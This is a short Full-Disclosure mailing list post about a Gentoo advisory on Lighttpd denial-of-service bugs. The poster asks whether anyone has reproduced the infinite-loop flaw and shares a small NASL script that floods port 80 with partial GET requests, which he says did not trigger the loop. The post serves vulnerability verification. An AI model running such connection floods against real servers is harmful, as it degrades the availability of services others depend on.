[Full-disclosure] [ GLSA 200705-07 ] Lighttpd: Two Denials of Service

[Michel Arboi]

> Robert Jakabosky discovered an infinite loop triggered by a connection
> abort when Lighttpd processes carriage return and line feed sequences.

Could anybody reproduce this DoS? I tried this NASL script without
success. The server rejects connections for about one minute (because
of kazillons of sockets in TIME_WAIT), but it only affects the
attacking source IP and I could not launch any CPU loop.

$ more /tmp/ec.nasl
i=  0;

while (s = open_sock_tcp(80))
{
i ++;
send(socket: s, data: 'GET / HTTP/1.0\r\n');
close(s);
}
display(i, ' done\n');
$